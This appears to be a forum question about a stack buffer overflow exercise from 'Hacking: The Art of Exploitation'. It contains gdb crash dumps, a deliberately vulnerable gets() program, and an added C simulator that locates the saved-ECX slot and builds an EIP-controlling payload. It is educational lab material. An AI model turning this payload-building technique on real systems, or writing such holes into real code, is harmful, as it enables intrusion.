Source code for both programs is at the end of the post.
So I've been working through Hacking: The Art Of Exploitation, and so far so good. I've managed to control EIP in the vulnerable program notesearch.c.
gdb-peda$ run $(perl -e 'print "a"x112 . "bbbb"')
Starting program: /root/hacking/booksrc/notesearch $(perl -e 'print "a"x112 . "bbbb"')
[DEBUG] found a 5 byte note for user id 0
[DEBUG] found a 7 byte note for user id 0
-------[ end of note data ]-------
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xbffff300 ('a' <repeats 36 times>, "%pre%3")
EDX: 0x0
ESI: 0x2
EDI: 0xb7fb5000 --> 0x1b3db0
EBP: 0x0
ESP: 0xbffff300 ('a' <repeats 36 times>, "%pre%3")
EIP: 0x61616161 ('aaaa')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x61616161
[------------------------------------stack-------------------------------------]
0000| 0xbffff300 ('a' <repeats 36 times>, "%pre%3")
0004| 0xbffff304 ('a' <repeats 32 times>, "%pre%3")
0008| 0xbffff308 ('a' <repeats 28 times>, "%pre%3")
0012| 0xbffff30c ('a' <repeats 24 times>, "%pre%3")
0016| 0xbffff310 ('a' <repeats 20 times>, "%pre%3")
0020| 0xbffff314 ('a' <repeats 16 times>, "%pre%3")
0024| 0xbffff318 ('a' <repeats 12 times>, "%pre%3")
0028| 0xbffff31c ("aaaaaaaa%pre%3")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x61616161 in ?? ()
gdb-peda$
However, once I write my own very simple buggy code and try to control EIP, this is what happens:
gdb-peda$ run
Starting program: /root/vulnerable
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbbbb
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x41414141 ('AAAA')
EDX: 0xb7fb687c --> 0x0
ESI: 0x1
EDI: 0xb7fb5000 --> 0x1b3db0
EBP: 0x41414141 ('AAAA')
ESP: 0x4141413d ('=AAA')
EIP: 0x804841d (<main+50>: ret)
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048416 <main+43>: mov ecx,DWORD PTR [ebp-0x4]
   0x8048419 <main+46>: leave
   0x804841a <main+47>: lea esp,[ecx-0x4]
=> 0x804841d <main+50>: ret
   0x804841e: xchg ax,ax
   0x8048420 <__libc_csu_init>: push ebp
   0x8048421 <__libc_csu_init+1>: push edi
   0x8048422 <__libc_csu_init+2>: push esi
[------------------------------------stack-------------------------------------]
Invalid $SP address: 0x4141413d
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804841d in main ()
gdb-peda$ p/x $eip
$1 = 0x804841d
gdb-peda$

I get nothing. Shouldn't ESP stay unchanged (since it isn't stored on the stack) and EIP get overwritten?
You can find notesearch.c @ link. Below is my "exploitable" program.
Needless to say, I have ASLR disabled and the programs are compiled with the -fno-stack-protector and -zexecstack flags. If you need more information, leave a comment.
#include <stdio.h>

int main(){
    char *buffer[64];   /* an array of 64 char pointers: 256 bytes on 32-bit, not 64 */
    gets(buffer);       /* unbounded read into the buffer; gets() expects char *, so this compiles with a type warning */
    return 0;
}
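An added example, not code from the question, the book or notesearch.c. The crash dump above shows gcc's stack-realignment epilogue for main(), `mov ecx,DWORD PTR [ebp-0x4]; leave; lea esp,[ecx-0x4]; ret`: ESP is reloaded from a saved copy of the original stack pointer kept at [ebp-4], which sits below the saved EBP and the return address and is therefore the first thing the overflow clobbers. With ECX = 0x41414141 the `lea` yields ESP = 0x4141413d, and `ret` faults reading that address before any return address is consumed. The program below replays that epilogue on a copy of the input, uses a cyclic pattern to locate the offset of the [ebp-4] slot from the crash value, and builds input that puts a valid address there so that `ret` pops a chosen value. BUF_ADDR, SAVED_ECX_OFF and TARGET_EIP are hypothetical constants chosen for the demo (on a real target they come from gdb), and the helper names rd32, wr32, make_pattern, pattern_offset, simulate_epilogue and build_payload are mine.

```c
/* Added example, not code from the question or the book. It replays the gcc
 * main() epilogue seen in the crash dump,
 *     mov ecx,DWORD PTR [ebp-0x4] ; leave ; lea esp,[ecx-0x4] ; ret
 * on a copy of the overflowed input, and builds input that survives it.
 * BUF_ADDR, SAVED_ECX_OFF and TARGET_EIP are hypothetical demo values; on a
 * real target they come from gdb (pattern offset, buffer address). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_ADDR      0xbffff2d0u  /* hypothetical: where gets() writes the input */
#define SAVED_ECX_OFF 268u         /* hypothetical: input offset of the [ebp-4] slot */
#define TARGET_EIP    0x08048400u  /* hypothetical: value we want ret to pop */

static uint32_t rd32(const uint8_t *p)       /* little-endian load, like x86 */
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void wr32(uint8_t *p, uint32_t v)      /* little-endian store */
{
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
}

/* Metasploit-style cyclic pattern "Aa0Aa1Aa2...": every 4-byte window is
 * unique for the first 20280 bytes, so a register value seen at the crash
 * maps back to exactly one offset in the input. */
static size_t make_pattern(char *out, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                const char trip[3] = { u, l, d };
                for (int t = 0; t < 3 && n < len; t++) out[n++] = trip[t];
            }
    return n;
}

/* Offset of a little-endian crash value inside the pattern, or -1. */
static long pattern_offset(const char *pat, size_t len, uint32_t value)
{
    uint8_t needle[4];
    wr32(needle, value);
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* Replay `mov ecx,[ebp-4]; lea esp,[ecx-4]; ret` against the input as it would
 * sit in memory at buf_addr. Returns 1 and the popped EIP when ret reads inside
 * the input; 0 when ESP lands outside it, which is the "Invalid $SP address"
 * fault at ret shown in the question. */
static int simulate_epilogue(const uint8_t *in, size_t len, uint32_t buf_addr,
                             size_t saved_ecx_off, uint32_t *esp_out, uint32_t *eip_out)
{
    if (saved_ecx_off + 4 > len) return 0;
    uint32_t esp = rd32(in + saved_ecx_off) - 4;          /* lea esp,[ecx-0x4] */
    *esp_out = esp;
    if (esp < buf_addr || (size_t)(esp - buf_addr) + 4 > len) return 0;
    *eip_out = rd32(in + (esp - buf_addr));               /* ret pops [esp] */
    return 1;
}

/* Filler up to the saved-ecx slot, then ecx = (address of the next dword) + 4
 * so that esp lands on that dword, then the dword itself. The address bytes
 * must not contain 0x0a, since gets() stops reading at a newline. */
static size_t build_payload(uint8_t *out, size_t cap, uint32_t buf_addr,
                            size_t saved_ecx_off, uint32_t target_eip)
{
    size_t n = saved_ecx_off + 8;
    if (n > cap) return 0;
    memset(out, 'A', saved_ecx_off);
    uint32_t eip_slot = buf_addr + (uint32_t)saved_ecx_off + 4;
    wr32(out + saved_ecx_off, eip_slot + 4);
    wr32(out + saved_ecx_off + 4, target_eip);
    return n;
}

int main(void)
{
    uint8_t buf[300];
    uint32_t esp = 0, eip = 0;

    /* 1. The question's input: ECX = 'AAAA', ESP = 0x4141413d, fault at ret. */
    memset(buf, 'A', sizeof buf);
    simulate_epilogue(buf, sizeof buf, BUF_ADDR, SAVED_ECX_OFF, &esp, &eip);
    printf("all-'A' input : esp=0x%08x (unmapped, ret faults)\n", esp);

    /* 2. Send the pattern and read ECX at the crash to learn the slot offset. */
    make_pattern((char *)buf, sizeof buf);
    uint32_t crash_ecx = rd32(buf + SAVED_ECX_OFF);        /* what gdb would show */
    printf("pattern input : ecx=0x%08x -> offset %ld\n", crash_ecx,
           pattern_offset((char *)buf, sizeof buf, crash_ecx));

    /* 3. Crafted input: ret now pops the chosen value. */
    size_t n = build_payload(buf, sizeof buf, BUF_ADDR, SAVED_ECX_OFF, TARGET_EIP);
    simulate_epilogue(buf, n, BUF_ADDR, SAVED_ECX_OFF, &esp, &eip);
    printf("crafted input : esp=0x%08x eip=0x%08x\n", esp, eip);
    return 0;
}
```

Build with `gcc -std=c99 -o epilogue_demo epilogue_demo.c` and run it; the three stages print in order. The dump in the question already tells the same story: ECX and EBP are both 0x41414141 and the faulting instruction is `ret` itself rather than an address made of input bytes, so the slot at [ebp-4] was overwritten before the return address was ever used. Feeding the real binary a cyclic pattern and reading ECX at the crash gives the true value of SAVED_ECX_OFF; alternatively, compiling the test program with `-mpreferred-stack-boundary=2` makes gcc drop the realignment and emit a plain `leave; ret` epilogue, after which the straightforward return-address overwrite behaves like the notesearch run.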